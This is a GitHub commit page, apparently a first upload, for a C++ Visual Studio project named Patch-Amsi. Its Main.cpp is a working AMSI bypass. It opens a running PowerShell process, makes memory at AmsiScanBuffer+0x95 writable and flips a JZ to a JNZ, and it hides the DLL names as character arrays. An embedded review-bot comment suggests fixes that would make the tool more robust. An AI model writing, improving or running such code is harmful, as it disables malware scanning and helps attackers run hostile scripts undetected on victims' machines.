
Commit 7d19364

authored
Add files via upload
0 parents  commit 7d19364


4 files changed

+406
-0
lines changed


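--- a/patch-amsi/Patch-Amsi.sln
+++ b/patch-amsi/Patch-Amsi.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.11.35327.3
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Patch-Amsi", "Patch-Amsi\Patch-Amsi.vcxproj", "{49DFD09A-DE64-4B00-9988-792B85CA68B4}"
+EndProject
+Global
+GlobalSection(SolutionConfigurationPlatforms) = preSolution
+Debug|x64 = Debug|x64
+Debug|x86 = Debug|x86
+Release|x64 = Release|x64
+Release|x86 = Release|x86
+EndGlobalSection
+GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Debug|x64.ActiveCfg = Debug|x64
+{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Debug|x64.Build.0 = Debug|x64
+{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Debug|x86.ActiveCfg = Debug|Win32
+{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Debug|x86.Build.0 = Debug|Win32
+{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Release|x64.ActiveCfg = Release|x64
+{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Release|x64.Build.0 = Release|x64
+{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Release|x86.ActiveCfg = Release|Win32
+{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Release|x86.Build.0 = Release|Win32
+EndGlobalSection
+GlobalSection(SolutionProperties) = preSolution
+HideSolutionNode = FALSE
+EndGlobalSection
+GlobalSection(ExtensibilityGlobals) = postSolution
+SolutionGuid = {91D3DBCF-32D6-4091-8265-2CD2EEE421CA}
+EndGlobalSection
+EndGlobal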

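--- a/patch-amsi/Patch-Amsi/Main.cpp
+++ b/patch-amsi/Patch-Amsi/Main.cpp
@@ -0,0 +1,218 @@
+#include <Windows.h>
+#include <TlHelp32.h>
+#include <winternl.h>
+#include <iostream>
+
+// link: https://learn.microsoft.com/en-us/windows/console/console-screen-buffers#character-attributes
+void SetConsoleColor(WORD color) {
+HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
+SetConsoleTextAttribute(hConsole, color);
+}
+
+typedef NTSTATUS(WINAPI* nt_write_virtual_memory_t)(
+HANDLE process_handle,
+PVOID base_address,
+PVOID buffer,
+ULONG number_of_bytes,
+PULONG number_of_bytes_written);
+
+typedef NTSTATUS(WINAPI* nt_open_process_t)(
+PHANDLE process_handle,
+ACCESS_MASK desired_access,
+POBJECT_ATTRIBUTES object_attributes,
+CLIENT_ID* client_id);
+
+DWORD obter_id_processo_por_nome(const wchar_t* nome_processo) {
+HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+if (snapshot != INVALID_HANDLE_VALUE) {
+PROCESSENTRY32W entrada_processo;
+entrada_processo.dwSize = sizeof(PROCESSENTRY32W);
+if (Process32FirstW(snapshot, &entrada_processo)) {
+do {
+if (wcscmp(entrada_processo.szExeFile, nome_processo) == 0) {
+CloseHandle(snapshot);
+return entrada_processo.th32ProcessID;
+}
+} while (Process32NextW(snapshot, &entrada_processo));
+}
+}
+CloseHandle(snapshot);
+return 0;
+}
+
+int main() {
+HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
+std::cout << "------------------------------------------------------------------------- \n" << std::endl;
+SetConsoleColor(FOREGROUND_RED | FOREGROUND_INTENSITY);
+printf(
+"~~~~~~~~~~~~~~~~~~~~~~ +-+-+-+-+-+-+-+-+-+-+-+-+-+ ~~~~~~~~~~~~~~~~~~~~~~\n"
+"~~~~~~~~~~~~~~~~~~~~~~ ||| /////////////////// ||| ~~~~~~~~~~~~~~~~~~~~~~\n"
+"~~~~~~~~~~~~~~~~~~~~~~ ||| -> Patch amsi.dll ||| ~~~~~~~~~~~~~~~~~~~~~~\n"
+"~~~~~~~~~~~~~~~~~~~~~~ ||| -> By Vithor176 ^-^ ||| ~~~~~~~~~~~~~~~~~~~~~~\n"
+"~~~~~~~~~~~~~~~~~~~~~~ ||| /////////////////// ||| ~~~~~~~~~~~~~~~~~~~~~~\n"
+"~~~~~~~~~~~~~~~~~~~~~~ +-+-+-+-+-+-+-+-+-+-+-+-+-+ ~~~~~~~~~~~~~~~~~~~~~~\n\n"
+);
+
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << "------------------------------------------------------------------------- \n" << std::endl;
+
+const wchar_t* nome_processo = L"powershell.exe";
+DWORD id_processo = obter_id_processo_por_nome(nome_processo);
+
+if (id_processo == 0) {
+SetConsoleColor(FOREGROUND_RED | FOREGROUND_INTENSITY);
+std::wcout << L"Processo " << nome_processo << L" nao encontrado." << std::endl;
+return 1;
+}
+
+const wchar_t n_dll_name[] = { 'n','t','d','l','l','.','d','l','l',0 };
+HMODULE h_ntdll = GetModuleHandleW(n_dll_name);
+if (!h_ntdll) {
+std::cout << "Falha ao carregar ntdll.dll." << std::endl;
+return 1;
+}
+
+auto nt_write_virtual_memory = (nt_write_virtual_memory_t)GetProcAddress(h_ntdll, "NtWriteVirtualMemory");
+auto nt_open_process = (nt_open_process_t)GetProcAddress(h_ntdll, "NtOpenProcess");
+
+if (!nt_write_virtual_memory || !nt_open_process) {
+std::cout << "Falha ao obter ponteiros para as funcoes NT." << std::endl;
+return 1;
+}
+
+CLIENT_ID client_id = { reinterpret_cast<HANDLE>(static_cast<uintptr_t>(id_processo)), nullptr };
+
+OBJECT_ATTRIBUTES obj_attributes;
+InitializeObjectAttributes(&obj_attributes, NULL, 0, NULL, NULL);
+
+HANDLE h_processo;
+NTSTATUS status = nt_open_process(&h_processo, PROCESS_ALL_ACCESS, &obj_attributes, &client_id);
+if (status != 0) {
+std::cout << "Falha ao abrir o processo. Codigo de erro: " << std::hex << status << std::endl;
+CloseHandle(h_processo);
+return 1;
+}
+
+const wchar_t am_dll[] = { 'a','m','s','i','.','d','l','l',0 };
+HMODULE h_amsi = LoadLibraryW(am_dll);
+if (h_amsi == NULL) {
+std::cout << "Falha ao carregar a biblioteca amsi.dll." << std::endl;
+CloseHandle(h_processo);
+return 1;
+}
+
+FARPROC amsi_scan_buffer = GetProcAddress(h_amsi, "AmsiScanBuffer");
+if (amsi_scan_buffer == NULL) {
+std::cout << "Falha ao localizar AmsiScanBuffer." << std::endl;
+FreeLibrary(h_amsi);
+CloseHandle(h_processo);
+return 1;
+}
+
+SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
+std::cout << "Endereco de AmsiScanBuffer: ";
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << amsi_scan_buffer << std::endl;
+SetConsoleTextAttribute(hConsole, 7);
+BYTE* endereco_patch = (BYTE*)amsi_scan_buffer + 0x95;
+SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
+std::cout << "Endereco de AmsiScanBuffer ";
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << "+ 0x95 = " << static_cast<void*>(endereco_patch) << std::endl;
+SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
+std::cout << "Endereco do patch: ";
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << static_cast<void*>(endereco_patch) << std::endl;
+
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << "\n-------------------------------------------------------------------------" << std::endl;
+
+MEMORY_BASIC_INFORMATION mbi;
+if (VirtualQueryEx(h_processo, endereco_patch, &mbi, sizeof(mbi))) {
+SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
+std::cout << "\nPermissao atual de memoria do patch: ";
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << mbi.Protect;
+BYTE current_byte;
+SIZE_T bytes_read;
+if (ReadProcessMemory(h_processo, endereco_patch, &current_byte, sizeof(current_byte), &bytes_read)) {
+SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
+std::cout << "\nValor atual no patch: ";
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << "0x" << std::hex << static_cast<int>(current_byte) << std::endl;
+}
+else {
+SetConsoleColor(FOREGROUND_RED | FOREGROUND_INTENSITY);
+std::cout << "\nFalha ao ler o valor atual do patch. Codigo de erro: " << GetLastError() << std::endl;
+}
+}
+
+DWORD old_protect;
+ULONG tamanho_regiao = 0x1000;
+
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << "\n-------------------------------------------------------------------------" << std::endl;
+
+SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
+std::cout << "Alterando a protecao de memoria do patch com ";
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << "VirtualProtectEx!" << std::endl;
+if (!VirtualProtectEx(h_processo, endereco_patch, tamanho_regiao, PAGE_EXECUTE_READWRITE, &old_protect)) {
+SetConsoleColor(FOREGROUND_RED | FOREGROUND_INTENSITY);
+std::cout << "\nFalha ao alterar permissoes de memoria. Codigo de erro: " << GetLastError() << std::endl;
+CloseHandle(h_processo);
+FreeLibrary(h_amsi);
+return 1;
+}
+
+SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
+std::cout << "\nPermissao de memoria do patch alterado para: ";
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << std::hex << old_protect << std::endl;
+
+// Patch - troca o byte de 0x74 para 0x75 (JZ para JNZ)
+BYTE patch = 0x75;
+SIZE_T bytes_escritos;
+status = nt_write_virtual_memory(h_processo, endereco_patch, &patch, sizeof(patch), (PULONG)&bytes_escritos);
+BYTE current_byte;
+SIZE_T bytes_read;
+if (ReadProcessMemory(h_processo, endereco_patch, &current_byte, sizeof(current_byte), &bytes_read)) {
+SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
+std::cout << "\nValor atual no patch apos a alteracao com ";
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << "NtWriteVirtualMemory: ";
+std::cout << "0x" << std::hex << static_cast<int>(current_byte) << std::endl;
+}
+else {
+SetConsoleColor(FOREGROUND_RED | FOREGROUND_INTENSITY);
+std::cout << "\nFalha ao ler o valor atual do patch. Codigo de erro: " << GetLastError() << std::endl;
+}
+
+if (status != 0 || bytes_escritos != sizeof(patch)) {
+std::cout << "\nFalha ao escrever na memoria. Codigo de erro: " << std::hex << status << std::endl;
+VirtualProtectEx(h_processo, endereco_patch, tamanho_regiao, old_protect, &old_protect);
+FreeLibrary(h_amsi);
+CloseHandle(h_processo);
+return 1;
+}
+
+if (!VirtualProtectEx(h_processo, endereco_patch, tamanho_regiao, old_protect, &old_protect)) {
+std::cout << "\nFalha ao restaurar permissões de memória. Codigo de erro: " << GetLastError() << std::endl;
+}
+else {
+SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
+std::cout << "\nPermissao de memoria do patch restaurada com sucesso." << std::endl;
+}
+
+FreeLibrary(h_amsi);
+CloseHandle(h_processo);
+
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << "-------------------------------------------------------------------------" << std::endl;
+
+SetConsoleColor(FOREGROUND_BLUE | FOREGROUND_INTENSITY);
+std::cout << "Patch aplicado com sucesso! :P" << std::endl;
+SetConsoleTextAttribute(hConsole, 7);
+std::cout << "-------------------------------------------------------------------------" << std::endl;
+return 0;
+}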
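Review bot: `h_processo` is declared without an initializer and the `nt_open_process` failure branch then calls `CloseHandle(h_processo)` on an indeterminate value; nothing was opened there, so declare it as `HANDLE h_processo = nullptr;` and drop the `CloseHandle` in that branch. The same uninitialized-memory pattern affects `bytes_escritos`: it is a `SIZE_T` but is handed to `NtWriteVirtualMemory` through a `(PULONG)` cast, so on x64 only the low 32 bits are ever written and the later `bytes_escritos != sizeof(patch)` check compares against whatever was in the upper half — declare it as `ULONG bytes_escritos = 0;` and pass `&bytes_escritos` with no cast, matching the `nt_write_virtual_memory_t` signature above. In `obter_id_processo_por_nome`, the fall-through `CloseHandle(snapshot);` runs even when `CreateToolhelp32Snapshot` returned `INVALID_HANDLE_VALUE`; return 0 early in that case instead. Separately, `std::hex` set on `std::cout` when printing `old_protect` is sticky, so every `GetLastError()` value printed afterwards appears in hex with no `0x` prefix while still being labelled as an error code.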
Lines changed: 135 additions & 0 deletions
@@ -0,0 +1,135 @@
1+
<?xml version="1.0" encoding="utf-8"?>
2+
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3+
<ItemGroup Label="ProjectConfigurations">
4+
<ProjectConfiguration Include="Debug|Win32">
5+
<Configuration>Debug</Configuration>
6+
<Platform>Win32</Platform>
7+
</ProjectConfiguration>
8+
<ProjectConfiguration Include="Release|Win32">
9+
<Configuration>Release</Configuration>
10+
<Platform>Win32</Platform>
11+
</ProjectConfiguration>
12+
<ProjectConfiguration Include="Debug|x64">
13+
<Configuration>Debug</Configuration>
14+
<Platform>x64</Platform>
15+
</ProjectConfiguration>
16+
<ProjectConfiguration Include="Release|x64">
17+
<Configuration>Release</Configuration>
18+
<Platform>x64</Platform>
19+
</ProjectConfiguration>
20+
</ItemGroup>
21+
<PropertyGroup Label="Globals">
22+
<VCProjectVersion>17.0</VCProjectVersion>
23+
<Keyword>Win32Proj</Keyword>
24+
<ProjectGuid>{49dfd09a-de64-4b00-9988-792b85ca68b4}</ProjectGuid>
25+
<RootNamespace>PatchAmsi</RootNamespace>
26+
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
27+
</PropertyGroup>
28+
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
29+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
30+
<ConfigurationType>Application</ConfigurationType>
31+
<UseDebugLibraries>true</UseDebugLibraries>
32+
<PlatformToolset>v143</PlatformToolset>
33+
<CharacterSet>Unicode</CharacterSet>
34+
</PropertyGroup>
35+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
36+
<ConfigurationType>Application</ConfigurationType>
37+
<UseDebugLibraries>false</UseDebugLibraries>
38+
<PlatformToolset>v143</PlatformToolset>
39+
<WholeProgramOptimization>true</WholeProgramOptimization>
40+
<CharacterSet>Unicode</CharacterSet>
41+
</PropertyGroup>
42+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
43+
<ConfigurationType>Application</ConfigurationType>
44+
<UseDebugLibraries>true</UseDebugLibraries>
45+
<PlatformToolset>v143</PlatformToolset>
46+
<CharacterSet>Unicode</CharacterSet>
47+
</PropertyGroup>
48+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
49+
<ConfigurationType>Application</ConfigurationType>
50+
<UseDebugLibraries>false</UseDebugLibraries>
51+
<PlatformToolset>v143</PlatformToolset>
52+
<WholeProgramOptimization>true</WholeProgramOptimization>
53+
<CharacterSet>Unicode</CharacterSet>
54+
</PropertyGroup>
55+
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
56+
<ImportGroup Label="ExtensionSettings">
57+
</ImportGroup>
58+
<ImportGroup Label="Shared">
59+
</ImportGroup>
60+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
61+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
62+
</ImportGroup>
63+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
64+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
65+
</ImportGroup>
66+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
67+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
68+
</ImportGroup>
69+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
70+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
71+
</ImportGroup>
72+
<PropertyGroup Label="UserMacros" />
73+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
74+
<ClCompile>
75+
<WarningLevel>Level3</WarningLevel>
76+
<SDLCheck>true</SDLCheck>
77+
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
78+
<ConformanceMode>true</ConformanceMode>
79+
</ClCompile>
80+
<Link>
81+
<SubSystem>Console</SubSystem>
82+
<GenerateDebugInformation>true</GenerateDebugInformation>
83+
</Link>
84+
</ItemDefinitionGroup>
85+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
86+
<ClCompile>
87+
<WarningLevel>Level3</WarningLevel>
88+
<FunctionLevelLinking>true</FunctionLevelLinking>
89+
<IntrinsicFunctions>true</IntrinsicFunctions>
90+
<SDLCheck>true</SDLCheck>
91+
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
92+
<ConformanceMode>true</ConformanceMode>
93+
</ClCompile>
94+
<Link>
95+
<SubSystem>Console</SubSystem>
96+
<EnableCOMDATFolding>true</EnableCOMDATFolding>
97+
<OptimizeReferences>true</OptimizeReferences>
98+
<GenerateDebugInformation>true</GenerateDebugInformation>
99+
</Link>
100+
</ItemDefinitionGroup>
101+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
102+
<ClCompile>
103+
<WarningLevel>Level3</WarningLevel>
104+
<SDLCheck>true</SDLCheck>
105+
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
106+
<ConformanceMode>true</ConformanceMode>
107+
</ClCompile>
108+
<Link>
109+
<SubSystem>Console</SubSystem>
110+
<GenerateDebugInformation>true</GenerateDebugInformation>
111+
</Link>
112+
</ItemDefinitionGroup>
113+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
114+
<ClCompile>
115+
<WarningLevel>Level3</WarningLevel>
116+
<FunctionLevelLinking>true</FunctionLevelLinking>
117+
<IntrinsicFunctions>true</IntrinsicFunctions>
118+
<SDLCheck>true</SDLCheck>
119+
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120+
<ConformanceMode>true</ConformanceMode>
121+
</ClCompile>
122+
<Link>
123+
<SubSystem>Console</SubSystem>
124+
<EnableCOMDATFolding>true</EnableCOMDATFolding>
125+
<OptimizeReferences>true</OptimizeReferences>
126+
<GenerateDebugInformation>true</GenerateDebugInformation>
127+
</Link>
128+
</ItemDefinitionGroup>
129+
<ItemGroup>
130+
<ClCompile Include="Main.cpp" />
131+
</ItemGroup>
132+
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
133+
<ImportGroup Label="ExtensionTargets">
134+
</ImportGroup>
135+
</Project>
